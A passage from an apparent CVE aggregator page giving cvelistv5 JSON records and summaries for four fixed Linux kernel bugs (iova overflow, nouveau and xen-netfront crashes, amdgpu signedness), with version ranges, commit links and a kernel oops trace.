"dateUpdated": "2025-05-04T09:24:50.911Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52910 (GCVE-0-2023-52910)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/iova: Fix alloc iova overflows issue
In __alloc_and_insert_iova_range, there is an issue that retry_pfn
overflows. The value of iovad->anchor.pfn_hi is ~0UL, then when
iovad->cached_node is iovad->anchor, curr_iova->pfn_hi + 1 will
overflow. As a result, if the retry logic is executed, low_pfn is
updated to 0, and then new_pfn < low_pfn returns false to make the
allocation successful.
This issue occurs in the following two situations:
1. The first iova size exceeds the domain size. When initializing
iova domain, iovad->cached_node is assigned as iovad->anchor. For
example, the iova domain size is 10M, start_pfn is 0x1_F000_0000,
and the iova size allocated for the first time is 11M. The
following is the log information, new->pfn_lo is smaller than
iovad->cached_node.
Example log as follows:
[ 223.798112][T1705487] sh: [name:iova&]__alloc_and_insert_iova_range
start_pfn:0x1f0000,retry_pfn:0x0,size:0xb00,limit_pfn:0x1f0a00
[ 223.799590][T1705487] sh: [name:iova&]__alloc_and_insert_iova_range
success start_pfn:0x1f0000,new->pfn_lo:0x1efe00,new->pfn_hi:0x1f08ff
2. The node with the largest iova->pfn_lo value in the iova domain
is deleted, iovad->cached_node will be updated to iovad->anchor,
and then the alloc iova size exceeds the maximum iova size that can
be allocated in the domain.
After judging that retry_pfn is less than limit_pfn, call retry_pfn+1
to fix the overflow issue.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52910",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:52.014408Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:03.507Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/iova.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c929a230c84441e400c32e7b7b4ab763711fb63e",
"status": "affected",
"version": "4e89dce725213d3d0b0475211b500eda4ef4bf2f",
"versionType": "git"
},
{
"lessThan": "61cbf790e7329ed78877560be7136f0b911bba7f",
"status": "affected",
"version": "4e89dce725213d3d0b0475211b500eda4ef4bf2f",
"versionType": "git"
},
{
"lessThan": "dcdb3ba7e2a8caae7bfefd603bc22fd0ce9a389c",
"status": "affected",
"version": "4e89dce725213d3d0b0475211b500eda4ef4bf2f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/iova.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/iova: Fix alloc iova overflows issue\n\nIn __alloc_and_insert_iova_range, there is an issue that retry_pfn\noverflows. The value of iovad-\u003eanchor.pfn_hi is ~0UL, then when\niovad-\u003ecached_node is iovad-\u003eanchor, curr_iova-\u003epfn_hi + 1 will\noverflow. As a result, if the retry logic is executed, low_pfn is\nupdated to 0, and then new_pfn \u003c low_pfn returns false to make the\nallocation successful.\n\nThis issue occurs in the following two situations:\n1. The first iova size exceeds the domain size. When initializing\niova domain, iovad-\u003ecached_node is assigned as iovad-\u003eanchor. For\nexample, the iova domain size is 10M, start_pfn is 0x1_F000_0000,\nand the iova size allocated for the first time is 11M. The\nfollowing is the log information, new-\u003epfn_lo is smaller than\niovad-\u003ecached_node.\n\nExample log as follows:\n[ 223.798112][T1705487] sh: [name:iova\u0026]__alloc_and_insert_iova_range\nstart_pfn:0x1f0000,retry_pfn:0x0,size:0xb00,limit_pfn:0x1f0a00\n[ 223.799590][T1705487] sh: [name:iova\u0026]__alloc_and_insert_iova_range\nsuccess start_pfn:0x1f0000,new-\u003epfn_lo:0x1efe00,new-\u003epfn_hi:0x1f08ff\n\n2. The node with the largest iova-\u003epfn_lo value in the iova domain\nis deleted, iovad-\u003ecached_node will be updated to iovad-\u003eanchor,\nand then the alloc iova size exceeds the maximum iova size that can\nbe allocated in the domain.\n\nAfter judging that retry_pfn is less than limit_pfn, call retry_pfn+1\nto fix the overflow issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:50.431Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c929a230c84441e400c32e7b7b4ab763711fb63e"
},
{
"url": "https://git.kernel.org/stable/c/61cbf790e7329ed78877560be7136f0b911bba7f"
},
{
"url": "https://git.kernel.org/stable/c/dcdb3ba7e2a8caae7bfefd603bc22fd0ce9a389c"
}
],
"title": "iommu/iova: Fix alloc iova overflows issue",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52910",
"datePublished": "2024-08-21T06:10:51.337Z",
"dateReserved": "2024-08-21T06:07:11.015Z",
"dateUpdated": "2025-05-04T07:45:50.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42101 (GCVE-0-2024-42101)
Vulnerability from cvelistv5
Published
2024-07-30 07:45
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau: fix null pointer dereference in nouveau_connector_get_modes
In nouveau_connector_get_modes(), the return value of drm_mode_duplicate()
is assigned to mode, which will lead to a possible NULL pointer
dereference on failure of drm_mode_duplicate(). Add a check to avoid npd.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 Version: 6ee738610f41b59733f63718f0bdbcba7d3a3f12 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.566Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9baf60323efa992b7c915094529f0a1882c34e7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e36364f5f3785d054a94e57e971385284886d41a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/274cba8d2d1b48c72d8bd90e76c9e2dc1aa0a81d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f48dd3f19614022f2e1b794fbd169d2b4c398c07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1f32535238493008587a8c5cb17eb2ca097592ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/744b229f09134ccd091427a6f9ea6d97302cfdd9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7db5411c5d0bd9c29b8c2ad93c36b5c16ea46c9e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80bec6825b19d95ccdfd3393cf8ec15ff2a749b4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42101",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:02.587669Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:59.551Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nouveau_connector.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9baf60323efa992b7c915094529f0a1882c34e7e",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "e36364f5f3785d054a94e57e971385284886d41a",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "274cba8d2d1b48c72d8bd90e76c9e2dc1aa0a81d",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "f48dd3f19614022f2e1b794fbd169d2b4c398c07",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "1f32535238493008587a8c5cb17eb2ca097592ef",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "744b229f09134ccd091427a6f9ea6d97302cfdd9",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "7db5411c5d0bd9c29b8c2ad93c36b5c16ea46c9e",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
},
{
"lessThan": "80bec6825b19d95ccdfd3393cf8ec15ff2a749b4",
"status": "affected",
"version": "6ee738610f41b59733f63718f0bdbcba7d3a3f12",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nouveau_connector.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.33"
},
{
"lessThan": "2.6.33",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau: fix null pointer dereference in nouveau_connector_get_modes\n\nIn nouveau_connector_get_modes(), the return value of drm_mode_duplicate()\nis assigned to mode, which will lead to a possible NULL pointer\ndereference on failure of drm_mode_duplicate(). Add a check to avoid npd."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:01.952Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9baf60323efa992b7c915094529f0a1882c34e7e"
},
{
"url": "https://git.kernel.org/stable/c/e36364f5f3785d054a94e57e971385284886d41a"
},
{
"url": "https://git.kernel.org/stable/c/274cba8d2d1b48c72d8bd90e76c9e2dc1aa0a81d"
},
{
"url": "https://git.kernel.org/stable/c/f48dd3f19614022f2e1b794fbd169d2b4c398c07"
},
{
"url": "https://git.kernel.org/stable/c/1f32535238493008587a8c5cb17eb2ca097592ef"
},
{
"url": "https://git.kernel.org/stable/c/744b229f09134ccd091427a6f9ea6d97302cfdd9"
},
{
"url": "https://git.kernel.org/stable/c/7db5411c5d0bd9c29b8c2ad93c36b5c16ea46c9e"
},
{
"url": "https://git.kernel.org/stable/c/80bec6825b19d95ccdfd3393cf8ec15ff2a749b4"
}
],
"title": "drm/nouveau: fix null pointer dereference in nouveau_connector_get_modes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42101",
"datePublished": "2024-07-30T07:45:57.384Z",
"dateReserved": "2024-07-29T15:50:41.173Z",
"dateUpdated": "2025-05-04T09:23:01.952Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41022 (GCVE-0-2024-41022)
Vulnerability from cvelistv5
Published
2024-07-29 13:34
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq()
The "instance" variable needs to be signed for the error handling to work.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5594971e02764aa1c8210ffb838cb4e7897716e8 Version: 8112fa72b7f139052843ff484130d6f97e9f052f Version: ea906e9ac61e3152bef63597f2d9f4a812fc346a Version: 011552f29f20842c9a7a21bffe1f6a2d6457ba46 Version: 5b0a3dc3e87821acb80e841b464d335aff242691 Version: 0964c84b93db7fbf74f357c1e20957850e092db3 Version: 8b2faf1a4f3b6c748c0da36cda865a226534d520 Version: 8b2faf1a4f3b6c748c0da36cda865a226534d520 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.181Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3dd9734878a9042f0358301d19a2b006a0fc4d06"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a5224e2123ce21102f346f518db80f004d5053a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/544fa213f15d27f0370795845d55eeb3e00080d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8dfbf83a82bbfb9680921719fbe65e535af59ea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4edb0a84e6b32e75dc9bd6dd085b2c2ff19ec287"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d347c9a398bf7eab9408d207c0a50fb720f9de7d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/298e2ce222e712ffafa47288c5b2fcf33d72fda3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6769a23697f17f9bf9365ca8ed62fe37e361a05a"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41022",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:24:22.256864Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:04.993Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3dd9734878a9042f0358301d19a2b006a0fc4d06",
"status": "affected",
"version": "5594971e02764aa1c8210ffb838cb4e7897716e8",
"versionType": "git"
},
{
"lessThan": "a5224e2123ce21102f346f518db80f004d5053a7",
"status": "affected",
"version": "8112fa72b7f139052843ff484130d6f97e9f052f",
"versionType": "git"
},
{
"lessThan": "544fa213f15d27f0370795845d55eeb3e00080d2",
"status": "affected",
"version": "ea906e9ac61e3152bef63597f2d9f4a812fc346a",
"versionType": "git"
},
{
"lessThan": "e8dfbf83a82bbfb9680921719fbe65e535af59ea",
"status": "affected",
"version": "011552f29f20842c9a7a21bffe1f6a2d6457ba46",
"versionType": "git"
},
{
"lessThan": "4edb0a84e6b32e75dc9bd6dd085b2c2ff19ec287",
"status": "affected",
"version": "5b0a3dc3e87821acb80e841b464d335aff242691",
"versionType": "git"
},
{
"lessThan": "d347c9a398bf7eab9408d207c0a50fb720f9de7d",
"status": "affected",
"version": "0964c84b93db7fbf74f357c1e20957850e092db3",
"versionType": "git"
},
{
"lessThan": "298e2ce222e712ffafa47288c5b2fcf33d72fda3",
"status": "affected",
"version": "8b2faf1a4f3b6c748c0da36cda865a226534d520",
"versionType": "git"
},
{
"lessThan": "6769a23697f17f9bf9365ca8ed62fe37e361a05a",
"status": "affected",
"version": "8b2faf1a4f3b6c748c0da36cda865a226534d520",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.10"
},
{
"lessThan": "6.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.281",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.223",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.102",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.43",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.281",
"versionStartIncluding": "5.4.278",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.223",
"versionStartIncluding": "5.10.219",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"versionStartIncluding": "5.15.161",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.102",
"versionStartIncluding": "6.1.94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.43",
"versionStartIncluding": "6.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.12",
"versionStartIncluding": "6.9.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.2",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq()\n\nThe \"instance\" variable needs to be signed for the error handling to work."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:18.524Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3dd9734878a9042f0358301d19a2b006a0fc4d06"
},
{
"url": "https://git.kernel.org/stable/c/a5224e2123ce21102f346f518db80f004d5053a7"
},
{
"url": "https://git.kernel.org/stable/c/544fa213f15d27f0370795845d55eeb3e00080d2"
},
{
"url": "https://git.kernel.org/stable/c/e8dfbf83a82bbfb9680921719fbe65e535af59ea"
},
{
"url": "https://git.kernel.org/stable/c/4edb0a84e6b32e75dc9bd6dd085b2c2ff19ec287"
},
{
"url": "https://git.kernel.org/stable/c/d347c9a398bf7eab9408d207c0a50fb720f9de7d"
},
{
"url": "https://git.kernel.org/stable/c/298e2ce222e712ffafa47288c5b2fcf33d72fda3"
},
{
"url": "https://git.kernel.org/stable/c/6769a23697f17f9bf9365ca8ed62fe37e361a05a"
}
],
"title": "drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41022",
"datePublished": "2024-07-29T13:34:23.507Z",
"dateReserved": "2024-07-12T12:17:45.614Z",
"dateUpdated": "2025-05-04T09:20:18.524Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48914 (GCVE-0-2022-48914)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xen/netfront: destroy queues before real_num_tx_queues is zeroed
xennet_destroy_queues() relies on info->netdev->real_num_tx_queues to
delete queues. Since d7dac083414eb5bb99a6d2ed53dc2c1b405224e5
("net-sysfs: update the queue counts in the unregistration path"),
unregister_netdev() indirectly sets real_num_tx_queues to 0. Those two
facts together means, that xennet_destroy_queues() called from
xennet_remove() cannot do its job, because it's called after
unregister_netdev(). This results in kfree-ing queues that are still
linked in napi, which ultimately crashes:
BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP PTI
CPU: 1 PID: 52 Comm: xenwatch Tainted: G W 5.16.10-1.32.fc32.qubes.x86_64+ #226
RIP: 0010:free_netdev+0xa3/0x1a0
Code: ff 48 89 df e8 2e e9 00 00 48 8b 43 50 48 8b 08 48 8d b8 a0 fe ff ff 48 8d a9 a0 fe ff ff 49 39 c4 75 26 eb 47 e8 ed c1 66 ff <48> 8b 85 60 01 00 00 48 8d 95 60 01 00 00 48 89 ef 48 2d 60 01 00
RSP: 0000:ffffc90000bcfd00 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff88800edad000 RCX: 0000000000000000
RDX: 0000000000000001 RSI: ffffc90000bcfc30 RDI: 00000000ffffffff
RBP: fffffffffffffea0 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800edad050
R13: ffff8880065f8f88 R14: 0000000000000000 R15: ffff8880066c6680
FS: 0000000000000000(0000) GS:ffff8880f3300000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 00000000e998c006 CR4: 00000000003706e0
Call Trace:
<TASK>
xennet_remove+0x13d/0x300 [xen_netfront]
xenbus_dev_remove+0x6d/0xf0
__device_release_driver+0x17a/0x240
device_release_driver+0x24/0x30
bus_remove_device+0xd8/0x140
device_del+0x18b/0x410
? _raw_spin_unlock+0x16/0x30
? klist_iter_exit+0x14/0x20
? xenbus_dev_request_and_reply+0x80/0x80
device_unregister+0x13/0x60
xenbus_dev_changed+0x18e/0x1f0
xenwatch_thread+0xc0/0x1a0
? do_wait_intr_irq+0xa0/0xa0
kthread+0x16b/0x190
? set_kthread_struct+0x40/0x40
ret_from_fork+0x22/0x30
</TASK>
Fix this by calling xennet_destroy_queues() from xennet_uninit(),
when real_num_tx_queues is still available. This ensures that queues are
destroyed when real_num_tx_queues is set to 0, regardless of how
unregister_netdev() was called.
Originally reported at
https://github.com/QubesOS/qubes-issues/issues/7257
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 35cad2003b6447932cfe91f795090586306738e8 Version: a5d8e6189b134f5db61be5cd59cf5a74bb01edc7 Version: 443133330a5d4a3fd429179d460cc297724fefe8 Version: 0abd3f9903fae6ecf8db3c89a459971fe7925499 Version: c5eb468cbc1fa663bf0cc6c5360802dea4e611c2 Version: d7dac083414eb5bb99a6d2ed53dc2c1b405224e5 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48914",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:50.755135Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:11.621Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/xen-netfront.c"
],
